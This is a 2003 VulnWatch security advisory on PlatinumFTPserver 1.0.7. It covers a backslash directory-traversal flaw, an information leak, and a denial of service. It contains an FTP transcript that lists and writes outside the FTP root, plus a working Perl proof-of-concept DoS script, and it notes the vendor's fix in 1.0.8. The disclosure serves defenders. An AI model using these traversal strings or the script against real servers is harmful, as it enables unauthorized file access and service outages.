[VulnWatch] Multiple vulnerabilities found in PlatinumFTPserver V1.0.7

From: matrix@infowarfare.dk
Date: 01/27/03

  • Next message: Wojciech Purczynski: "[VulnWatch] Sun Microsystems Solaris at -r job name handling and race condition vulnerabilities"
    Date: Mon, 27 Jan 2003 08:01:52 +0100
    From: matrix@infowarfare.dk
    To: undisclosed-recipients:;
    

                       Multiple vulnerabilities found in
                            PlatinumFTPserver V1.0.7
                     PlatinumFTPserver (C)2002 BYTE/400 LTD
                                            
                          Discovered by Dennis Rand
                          http://www.infowarfare.dk
    ------------------------------------------------------------------------

    SUMMARY
    PlatinumFTPserver simplifies management of all your Ftp clients with regards
    to sending and receiving program and data files over an IP connection.
    Working within a control screen, PlatinumFTPserver gives you total
    control: you can create and manage users, user groups and root directories.
    You can define what Ftp Commands the users or groups can access.
    PlatinumFTPserver provides activity logs, client connection details, file
    and megabyte graphical statistics by session and day, virtual folders and a
    built in Web Browser. The server engine runs as an application on Windows 9x
    and a service under NT/2K/XP.
    PlatinumFTPserver can bind to one or all IP addresses within the PC. All
    configuration data for the server including password and description fields
    are encrypted using the powerful Blowfish cipher. Clients can request files
    be zipped before transfer, execute scripts created with the VBscript editor
    and also access the shell process.

    A vulnerability in the product allows remote attackers to cause
    the server to traverse into directories that reside outside the bounding
    FTP root directory. Another vulnerability is that it is possible to preform
    a DoS attack on the server.
    The server also sends out to many information, the size of the harddrive
    the login location is located and the server time, this is all "harmeless"
    information but it can be used in an attack.

    DETAILS

    Vulnerable systems:
     * PlatinumFTPServer version 1.0.7
       

    Immune systems:
     * PlatinumFTPServer version 1.0.8

    PlatinumFTP failure to filter out "\.." sequences in command requests allows
    remote users to break out of restricted directories and gain read access
    to the system directory structure; Possibility for deleting files and
    preforming
    a DoS attack on the server. Revealing information about the server

    The following transcript demonstrates a sample exploitation of the
    vulnerabilities:

    Connected to 192.168.1.199.
    220-PlatinumFTPserver V1.0.7
    220-PlatinumFTPserver (C)2002 BYTE/400 LTD
    220-
    220 Enter login details
    User (192.168.1.199:(none)): anonymous
    331 Password required for anonymous.
    Password:
    230-Send comments to support@PlatinumFTP.com
    230-Date 24-01-03, Time 14:28:08. <===== Server time and date
    230 Storage available 1.558.704.640 Bytes. <===== Here you can see how much
    server space there are located.
    ftp> dir
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> ls
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> cd ..
    550 Access denied
    ftp> cd ...
    550 Access denied
    ftp> cd /
    250 CWD command successful.
    ftp> ls
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> cd /../../../
    500 ../ reference not allowed for security reasons.
    ftp> cd \..\..\..\
    550 Access denied
    ftp> dir /../../../
    200 PORT command successful
    500 ../ reference not allowed for security reasons.
    ftp> dir \..\..\..\..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
    -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
    drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
    drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
    til Windows Update
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
    -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
    -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
    drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
    -rwxr-xr-x 1 User Group 524288000 Jan 24 14:27 pagefile.sys
    drwxr-xr-x 1 User Group 0 Jan 24 14:01 Program Files
    drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
    drwxr-xr-x 1 User Group 0 Jan 24 14:09 TEMP
    drwxr-xr-x 1 User Group 0 Jan 24 14:28 WINNT
    226 Listing complete.
    ftp: 1181 bytes received in 0,02Seconds 59,05Kbytes/sec.
    ftp> debug
    Debugging On .
    ftp> mkdir \..\..\..\sm00
    ---> XMKD \..\..\..\sm00
    257 \..\..\..\sm00 directory created
    ftp> dir \..\..\
    ---> PORT 192,168,1,21,18,161
    200 PORT command successful
    ---> LIST \..\..\
    150 Opening ASCII mode data connection for /bin/ls.
    drwxr-xr-x 1 User Group 0 Jan 24 14:09 PlatinumFTPserver
    226 Listing complete.
    ftp: 76 bytes received in 0,01Seconds 7,60Kbytes/sec.
    ftp> dir \..\..\..\
    ---> PORT 192,168,1,21,18,162
    200 PORT command successful
    ---> LIST \..\..\..\
    150 Opening ASCII mode data connection for /bin/ls.
    drwxr-xr-x 1 User Group 0 Jan 24 14:01 BYTE400
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Common Files
    drwxr-xr-x 1 User Group 0 Dec 23 23:32 EuroTool
    drwxr-xr-x 1 User Group 0 Dec 23 21:28 ICW-Internet
    Connection Wizard
    drwxr-xr-x 1 User Group 0 Dec 23 22:11 MarkVis
    drwxr-xr-x 1 User Group 0 Dec 23 22:31 Mts
    drwxr-xr-x 1 User Group 0 Dec 23 21:28 Outlook Express
    drwxr-xr-x 1 User Group 0 Dec 23 12:17 Plus!
    drwxr-xr-x 1 User Group 0 Jan 24 15:01 sm00
    drwxr-xr-x 1 User Group 0 Dec 23 21:24 Uninstall Information
    drwxr-xr-x 1 User Group 0 Dec 23 21:10 VMware
    drwxr-xr-x 1 User Group 0 Dec 23 22:44 Windows NT
    drwxr-xr-x 1 User Group 0 Dec 23 23:44 WindowsUpdate
    drwxr-xr-x 1 User Group 0 Jan 18 08:38 WinRAR
    226 Listing complete.
    ftp: 973 bytes received in 0,09Seconds 10,93Kbytes/sec.
    ftp> bye
    221 Goodbye.

    Exploit code for DoS attack:
    ------------------------------------- CUT HERE --------------------------------
    ---------
    #!/usr/bin/perl
    #
    # PlatinumFTPserver V1.0.7 DoS attack
    # http://www.PlatinumFTP.com
    # Dennis Rand - Matrix@infowarfare.dk
    #
    # When this exploit has been used, the server has to be restarted, if the FTPd
    is
    # just killed and then restarted the CPU will go to 100% again
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    #
    #
    use Net::FTP;

        
    $target = shift() || die "usage: target ip";
    my $user = "anonymous";
    my $pass = "crash\@burn.com";

    system('cls');
    print "PlatinumFTPserver V1.0.7 DoS attack\n";
    print "Trying to connect to target system at: $target...\n";
    $ftp = Net::FTP->new($target, Debug => 1, Port => 21) || die "could not
    connect: $!";
    $ftp->login($user, $pass) || die "could not login: $!";
    $ftp->cwd("/");

    print "The FTP service now uses 100% CPU on the server...\n";
    $ftp->cwd("cd @/..@/..");
    $ftp->quit;

    ------------------------------------- CUT HERE --------------------------------
    ---------

    Detection:
    PlatinumFTPServer version 1.0.7 is vulnerable to the above-described attacks.
    Earlier versions may be susceptible as well. To determine if a specific
    implementation is vulnerable, experiment by following the above
    transcript.

    Vendor response:
    This security issues has now been fixed in version 1.0.8 and can be
    downloaded from www.platinumftp.com/updates/platinumftpserver.exe
    Regards
    Chris Fitzsimons
    BYTE400 Technical Support

    Disclosure timeline:
    24/01/2003 Found the Vulnerability.
    24/01/2003 Vendor mail at Bugs@platinumftp.com
    27/01/2003 Recived response from vendor that the problem is fixed
    27/01/2003 Public Disclosure.

    ADDITIONAL INFORMATION
    The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Dennis Rand

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind.
    In no event shall we be liable for any damages whatsoever including direct,
    indirect,
    incidental, consequential, loss of business profits or special damages.

    -------------------------------------------------
    This mail sent through IMP: http://horde.org/imp/